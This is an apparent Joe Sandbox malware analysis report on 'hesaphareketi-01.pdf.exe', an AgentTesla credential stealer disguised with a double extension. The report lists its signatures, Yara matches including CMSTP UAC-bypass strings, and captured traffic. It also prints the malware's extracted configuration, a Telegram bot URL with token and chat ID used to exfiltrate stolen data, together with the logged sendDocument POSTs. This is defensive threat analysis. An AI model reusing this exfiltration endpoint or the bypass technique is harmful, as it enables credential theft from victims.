Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hesaphareketi-01.pdf.exe

Overview

General Information

Sample name:hesaphareketi-01.pdf.exe
Analysis ID:1446992
MD5:8f184daf4d3d0fac93db93c798e616ed
SHA1:f8c6c99b7e0572347ed1bee3ddb425e31f6cb643
SHA256:97fa9df0ae7536db7c2427ff65ba51db3bbd22ebe957bf406ebe3f4ba4a46f7f
Tags:AgentTeslaexegeoTelegramTUR
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected Telegram RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • hesaphareketi-01.pdf.exe (PID: 6992 cmdline: "C:\Users\user\Desktop\hesaphareketi-01.pdf.exe" MD5: 8F184DAF4D3D0FAC93DB93C798E616ED)
    • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 6596 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendMessage?chat_id=6553028274"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
hesaphareketi-01.pdf.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
    hesaphareketi-01.pdf.exeINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMDDetects Windows exceutables bypassing UAC using CMSTP utility, command line and INFditekSHen
    • 0x14fa04:$s2: taskkill /IM cmstp.exe /F
    • 0x14f936:$s5: RunPreSetupCommands=RunPreSetupCommandsSection
    • 0x14fafa:$s6: "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1208684446.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                Click to see the 15 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.2.hesaphareketi-01.pdf.exe.23682040090.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.hesaphareketi-01.pdf.exe.23682040090.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    0.2.hesaphareketi-01.pdf.exe.23682040090.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                      0.2.hesaphareketi-01.pdf.exe.23682040090.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                      • 0x314fc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                      • 0x3156e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                      • 0x315f8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                      • 0x3168a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                      • 0x316f4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                      • 0x31766:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                      • 0x317fc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                      • 0x3188c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                      3.2.RegAsm.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                        Click to see the 23 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Suspicious Double Extension File Execution
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\hesaphareketi-01.pdf.exe", CommandLine: "C:\Users\user\Desktop\hesaphareketi-01.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe, NewProcessName: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe, OriginalFileName: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\user\Desktop\hesaphareketi-01.pdf.exe", ProcessId: 6992, ProcessName: hesaphareketi-01.pdf.exe

                        Snort Signatures

                        Timestamp:05/24/24-07:41:27.363485
                        SID:2851779
                        Source Port:49700
                        Destination Port:443
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Found malware configuration
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendMessage?chat_id=6553028274"}
                        Source: RegAsm.exe.6596.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendMessage"}
                        Multi AV Scanner detection for submitted file
                        Source: hesaphareketi-01.pdf.exeReversingLabs: Detection: 34%
                        Source: hesaphareketi-01.pdf.exeVirustotal: Detection: 39%Perma Link
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability

                        Exploits

                        barindex
                        Yara detected UAC Bypass using CMSTP
                        Source: Yara matchFile source: hesaphareketi-01.pdf.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.hesaphareketi-01.pdf.exe.7ff7341d0000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.hesaphareketi-01.pdf.exe.7ff7341d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1208684446.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.pdf.exe PID: 6992, type: MEMORYSTR
                        Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:49699 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49700 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49708 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49709 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49710 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49711 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49712 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49713 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49714 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49715 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49716 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49719 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49720 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49721 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49722 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49724 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49725 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49728 version: TLS 1.2
                        Source: hesaphareketi-01.pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

                        Networking

                        barindex
                        Snort IDS alert for network traffic
                        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.7:49700 -> 149.154.167.220:443
                        Uses the Telegram API (likely for C&C communication)
                        Source: unknownDNS query: name: api.telegram.org
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc7b929ff59cb4Host: api.telegram.orgContent-Length: 980Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc88931a5d0108Host: api.telegram.orgContent-Length: 66751Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc90cd1e5e4e83Host: api.telegram.orgContent-Length: 66751Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc9817b6b6812fHost: api.telegram.orgContent-Length: 70703Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc9a12c02f0750Host: api.telegram.orgContent-Length: 70703Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc9c148a05a466Host: api.telegram.orgContent-Length: 66751Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc9ece9c66b2c0Host: api.telegram.orgContent-Length: 66751Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dca51c7ada008aHost: api.telegram.orgContent-Length: 66754Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dca773f71df223Host: api.telegram.orgContent-Length: 66754Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcaba1a50f6e18Host: api.telegram.orgContent-Length: 66754Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcae7fd2a8c765Host: api.telegram.orgContent-Length: 67229Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcb1ecef588748Host: api.telegram.orgContent-Length: 67317Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcb6c88add5f77Host: api.telegram.orgContent-Length: 66754Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcc4c57a67a1f1Host: api.telegram.orgContent-Length: 66765Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcc78492d93770Host: api.telegram.orgContent-Length: 66765Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dccb6d9b422ea1Host: api.telegram.orgContent-Length: 66765Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcce4615a1f8c7Host: api.telegram.orgContent-Length: 66765Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcd0bba16aab02Host: api.telegram.orgContent-Length: 66765Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcd5bf69ee82a1Host: api.telegram.orgContent-Length: 66989Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcd96a0224ce84Host: api.telegram.orgContent-Length: 66765Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcdd588123294fHost: api.telegram.orgContent-Length: 66765Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc7b9c07669e21Host: api.telegram.orgContent-Length: 66765Expect: 100-continueConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                        Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                        Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                        Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                        Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                        Source: unknownHTTP traffic detected: POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc7b929ff59cb4Host: api.telegram.orgContent-Length: 980Expect: 100-continueConnection: Keep-Alive
                        Source: RegAsm.exe, 00000003.00000002.3677180762.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                        Source: hesaphareketi-01.pdf.exeString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
                        Source: hesaphareketi-01.pdf.exe, 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidX
                        Source: hesaphareketi-01.pdf.exeString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
                        Source: hesaphareketi-01.pdf.exeString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: hesaphareketi-01.pdf.exe, 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameX
                        Source: hesaphareketi-01.pdf.exe, 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                        Source: hesaphareketi-01.pdf.exeString found in binary or memory: https://aka.ms/dotnet-warnings/
                        Source: hesaphareketi-01.pdf.exe, 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                        Source: RegAsm.exe, 00000003.00000002.3677180762.0000000002B3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                        Source: RegAsm.exe, 00000003.00000002.3677180762.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.00000000028D8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002981000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.000000000289A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                        Source: hesaphareketi-01.pdf.exe, 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/
                        Source: RegAsm.exe, 00000003.00000002.3677180762.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.00000000028D8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002981000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3677180762.000000000289A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument
                        Source: RegAsm.exe, 00000003.00000002.3677180762.0000000002B3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgx
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                        Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:49699 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49700 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49708 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49709 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49710 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49711 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49712 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49713 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49714 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49715 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49716 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49719 version: TLS 1.2
